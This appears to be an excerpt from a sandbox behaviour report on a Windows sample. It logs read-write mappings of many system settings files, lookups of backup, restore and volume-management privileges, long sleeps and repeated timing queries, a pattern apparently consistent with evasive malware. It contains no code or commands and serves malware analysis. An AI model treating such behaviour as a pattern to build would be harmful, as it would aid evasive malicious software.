Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerSlideEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ThreeFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_TwoFingerTapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Input_Touch_ZoomEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoCorrectionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsAutoShiftEngageEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsCompatibilityKeyboardEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsDoubleTapSpaceEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsKeyAudioFeedbackEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsPredictionSpaceInsertionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2128 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsShiftLockEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsSpellcheckingEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Keyboard_IsTextPredictionEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Add_Profile.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Installed_Profiles_Collection.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Personal_Data_Control.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Language_Web_Content_Control.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_DeleteAll.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Maps_Download_Add_Package.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_ResetYourPC.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_PreviewBuild.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2096 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows7.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Misc_RollbackYourPC_Windows8_1.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_AeroSnapEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_JointResizeEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapAssistEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MultiTasking_SnapFillEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_AdvancedSettingsLink.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_MusUpdate_UpdateActionButton.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_PinnedQuickActions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SelectIconsToAppearOnTaskbar.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2112 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_ShowAppNotifications.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SoftLandingEnabled.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2080 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_Notifications_SystemIcons.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_ActivateWindowsLicense.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2064 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_GetPCName.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_InstalledRamStatus.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2048 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinCloudDomain.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SystemSettings_PCSystem_JoinDomain.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2000 True 1
Fn
For performance reasons, the remaining 1011 entries are omitted.
The remaining entries can be found in glog.xml.
User (3)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeBackupPrivilege, luid = 17 True 1
Fn
Lookup Privilege privilege = SeRestorePrivilege, luid = 18 True 1
Fn
Lookup Privilege privilege = SeManageVolumePrivilege, luid = 28 True 1
Fn
System (1027)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = NQDPDE True 1
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) True 12
Fn
Sleep duration = -1 (infinite) False 12
Fn
Sleep duration = 10000 milliseconds (10.000 seconds) False 1
Fn
Get Time type = System Time, time = 2019-07-22 06:01:14 (UTC) True 1
Fn
Get Time type = System Time, time = 2019-07-22 06:01:15 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 13426186888 True 1
Fn
Get Time type = Performance Ctr, time = 13427539581 True 1
Fn
Get Time type = Performance Ctr, time = 13429109234 True 1
Fn
Get Time type = Performance Ctr, time = 13430152222 True 1
Fn
Get Time type = Performance Ctr, time = 13433919523 True 1
Fn
Get Time type = Performance Ctr, time = 13462534632 True 1
Fn
Get Time type = Performance Ctr, time = 13464545478 True 1
Fn
Get Time type = Performance Ctr, time = 13488426221 True 1
Fn
Get Time type = Performance Ctr, time = 13526864816 True 1
Fn
Get Time type = Performance Ctr, time = 13529139361 True 1
Fn
Get Time type = Performance Ctr, time = 13539294895 True 1
Fn
Get Time type = Performance Ctr, time = 13554361909 True 1
Fn
Get Time type = Performance Ctr, time = 13557724757 True 1
Fn
Get Time type = Performance Ctr, time = 13557912935 True 1
Fn
Get Time type = Performance Ctr, time = 13566344320 True 1
Fn
Get Time type = Performance Ctr, time = 13566852019 True 1
Fn
Get Time type = Performance Ctr, time = 13567199021 True 1
Fn
Get Time type = Performance Ctr, time = 13567876576 True 1
Fn
Get Time type = Performance Ctr, time = 13605155719 True 1
Fn
Get Time type = Performance Ctr, time = 13623171799 True 1
Fn
Get Time type = Performance Ctr, time = 13644375453 True 1
Fn
Get Time type = Performance Ctr, time = 13644986022 True 1
Fn
Get Time type = Performance Ctr, time = 13658482358 True 1
Fn
Get Time type = Performance Ctr, time = 13659001853 True 1
Fn
Get Time type = Performance Ctr, time = 13659357452 True 1
Fn
Get Time type = Performance Ctr, time = 13660169107 True 1
Fn
Get Time type = Performance Ctr, time = 13661136179 True 1
Fn
Get Time type = Performance Ctr, time = 13662189338 True 1
Fn
Get Time type = Performance Ctr, time = 13662544635 True 1
Fn
Get Time type = Performance Ctr, time = 13663332839 True 1
Fn
Get Time type = Performance Ctr, time = 13713193230 True 1
Fn
Get Time type = Performance Ctr, time = 13737277798 True 1
Fn
Get Time type = Performance Ctr, time = 13738908681 True 1
Fn
Get Time type = Performance Ctr, time = 13742004116 True 1
Fn
Get Time type = Performance Ctr, time = 13742458299 True 1
Fn
Get Time type = Performance Ctr, time = 13742751211 True 1
Fn
Get Time type = Performance Ctr, time = 13744881033 True 1
Fn
Get Time type = Performance Ctr, time = 13746926713 True 1
Fn
Get Time type = Performance Ctr, time = 13759556175 True 1
Fn
Get Time type = Performance Ctr, time = 13759840983 True 1
Fn
Get Time type = Performance Ctr, time = 13760294503 True 1
Fn
Get Time type = Performance Ctr, time = 13760644435 True 1
Fn
Get Time type = Performance Ctr, time = 13761103244 True 1
Fn
Get Time type = Performance Ctr, time = 13761433085 True 1
Fn
Get Time type = Performance Ctr, time = 13761807217 True 1
Fn
Get Time type = Performance Ctr, time = 13762157625 True 1
Fn
Get Time type = Performance Ctr, time = 13762730448 True 1
Fn
Get Time type = Performance Ctr, time = 13763770424 True 1
Fn
Get Time type = Performance Ctr, time = 13764390543 True 1
Fn
Get Time type = Performance Ctr, time = 13764829138 True 1
Fn
Get Time type = Performance Ctr, time = 13765160123 True 1
Fn
Get Time type = Performance Ctr, time = 13765633475 True 1
Fn
Get Time type = Performance Ctr, time = 13766193694 True 1
Fn
Get Time type = Performance Ctr, time = 13766515582 True 1
Fn
Get Time type = Performance Ctr, time = 13766915701 True 1
Fn
Get Time type = Performance Ctr, time = 13767426220 True 1
Fn
Get Time type = Performance Ctr, time = 13768046224 True 1
Fn
Get Time type = Performance Ctr, time = 13768472364 True 1
Fn
Get Time type = Performance Ctr, time = 13768808102 True 1
Fn
Get Time type = Performance Ctr, time = 13769107170 True 1
Fn
Get Time type = Performance Ctr, time = 13769442602 True 1
Fn
Get Time type = Performance Ctr, time = 13769692536 True 1
Fn
Get Time type = Performance Ctr, time = 13770048111 True 1
Fn
Get Time type = Performance Ctr, time = 13770529737 True 1
Fn
Get Time type = Performance Ctr, time = 13771029846 True 1
Fn
Get Time type = Performance Ctr, time = 13771372312 True 1
Fn
Get Time type = Performance Ctr, time = 13771698243 True 1
Fn
Get Time type = Performance Ctr, time = 13771998150 True 1
Fn
Get Time type = Performance Ctr, time = 13772323863 True 1
Fn
Get Time type = Performance Ctr, time = 13772654048 True 1
Fn
Get Time type = Performance Ctr, time = 13773113554 True 1
Fn
Get Time type = Performance Ctr, time = 13774940867 True 1
Fn
Get Time type = Performance Ctr, time = 13777030677 True 1
Fn
Get Time type = Performance Ctr, time = 13777347037 True 1
Fn
Get Time type = Performance Ctr, time = 13777687169 True 1
Fn
Get Time type = Performance Ctr, time = 13777960038 True 1
Fn
Get Time type = Performance Ctr, time = 13779344120 True 1
Fn
Get Time type = Performance Ctr, time = 13779693731 True 1
Fn
Get Time type = Performance Ctr, time = 13782243403 True 1
Fn
Get Time type = Performance Ctr, time = 13785366143 True 1
Fn
Get Time type = Performance Ctr, time = 13799158739 True 1
Fn
Get Time type = Performance Ctr, time = 13803502753 True 1
Fn
Get Time type = Performance Ctr, time = 13805087473 True 1
Fn
Get Time type = Performance Ctr, time = 13805669744 True 1
Fn
Get Time type = Performance Ctr, time = 13806571932 True 1
Fn
Get Time type = Performance Ctr, time = 13806942698 True 1
Fn
Get Time type = Performance Ctr, time = 13807294782 True 1
Fn
Get Time type = Performance Ctr, time = 13807627017 True 1
Fn
Get Time type = Performance Ctr, time = 13807966839 True 1
Fn
Get Time type = Performance Ctr, time = 13808312942 True 1
Fn
Get Time type = Performance Ctr, time = 13808608943 True 1
Fn
Get Time type = Performance Ctr, time = 13831153589 True 1
Fn
Get Time type = Performance Ctr, time = 13845679095 True 1
Fn
Get Time type = Performance Ctr, time = 13846137315 True 1
Fn
Get Time type = Performance Ctr, time = 13846644750 True 1
Fn
Get Time type = Performance Ctr, time = 13847710902 True 1
Fn
Get Time type = Performance Ctr, time = 13850447769 True 1
Fn
Get Time type = Performance Ctr, time = 13851098976 True 1
Fn
Get Time type = Performance Ctr, time = 13851991424 True 1
Fn
Get Time type = Performance Ctr, time = 13853069469 True 1
Fn
Get Time type = Performance Ctr, time = 13854046492 True 1
Fn
Get Time type = Performance Ctr, time = 13854641853 True 1
Fn
Get Time type = Performance Ctr, time = 13855277042 True 1
Fn
Get Time type = Performance Ctr, time = 13855793682 True 1
Fn
Get Time type = Performance Ctr, time = 13856317987 True 1
Fn
Get Time type = Performance Ctr, time = 13856874738 True 1
Fn
Get Time type = Performance Ctr, time = 13857398269 True 1
Fn
Get Time type = Performance Ctr, time = 13858291473 True 1
Fn
Get Time type = Performance Ctr, time = 13859291348 True 1
Fn
Get Time type = Performance Ctr, time = 13860018229 True 1
Fn
Get Time type = Performance Ctr, time = 13860571025 True 1
Fn
Get Time type = Performance Ctr, time = 13860955677 True 1
Fn
Get Time type = Performance Ctr, time = 13861415556 True 1
Fn
Get Time type = Performance Ctr, time = 13861931099 True 1
Fn
Get Time type = Performance Ctr, time = 13862453941 True 1
Fn
Get Time type = Performance Ctr, time = 13862911315 True 1
Fn
Get Time type = Performance Ctr, time = 13863443078 True 1
Fn
Get Time type = Performance Ctr, time = 13863913364 True 1
Fn
Get Time type = Performance Ctr, time = 13864495221 True 1
Fn
Get Time type = Performance Ctr, time = 13865015979 True 1
Fn
Get Time type = Performance Ctr, time = 13865565968 True 1
Fn
Get Time type = Performance Ctr, time = 13866111589 True 1
Fn
Get Time type = Performance Ctr, time = 13866760325 True 1
Fn
Get Time type = Performance Ctr, time = 13867321452 True 1
Fn
Get Time type = Performance Ctr, time = 13868218539 True 1
Fn
Get Time type = Performance Ctr, time = 13870633318 True 1
Fn
Get Time type = Performance Ctr, time = 13873968449 True 1
Fn
Get Time type = Performance Ctr, time = 13874499872 True 1
Fn
Get Time type = Performance Ctr, time = 13875005952 True 1
Fn
Get Time type = Performance Ctr, time = 13875562929 True 1
Fn
Get Time type = Performance Ctr, time = 13876134453 True 1
Fn
Get Time type = Performance Ctr, time = 13876673699 True 1
Fn
Get Time type = Performance Ctr, time = 13877209524 True 1
Fn
Get Time type = Performance Ctr, time = 13878084564 True 1
Fn
Get Time type = Performance Ctr, time = 13879164159 True 1
Fn
Get Time type = Performance Ctr, time = 13880914477 True 1
Fn
Get Time type = Performance Ctr, time = 13883058967 True 1
Fn
Get Time type = Performance Ctr, time = 13883632761 True 1
Fn
Get Time type = Performance Ctr, time = 13884185253 True 1
Fn
Get Time type = Performance Ctr, time = 13884743666 True 1
Fn
Get Time type = Performance Ctr, time = 13885335252 True 1
Fn
Get Time type = Performance Ctr, time = 13886098973 True 1
Fn
Get Time type = Performance Ctr, time = 13886661400 True 1
Fn
Get Time type = Performance Ctr, time = 13887131090 True 1
Fn
Get Time type = Performance Ctr, time = 13887648360 True 1
Fn
Get Time type = Performance Ctr, time = 13888208391 True 1
Fn
Get Time type = Performance Ctr, time = 13888843575 True 1
Fn
Get Time type = Performance Ctr, time = 13889342099 True 1
Fn
Get Time type = Performance Ctr, time = 13889826414 True 1
Fn
Get Time type = Performance Ctr, time = 13890352763 True 1
Fn
Get Time type = Performance Ctr, time = 13890925683 True 1
Fn
Get Time type = Performance Ctr, time = 13891459899 True 1
Fn
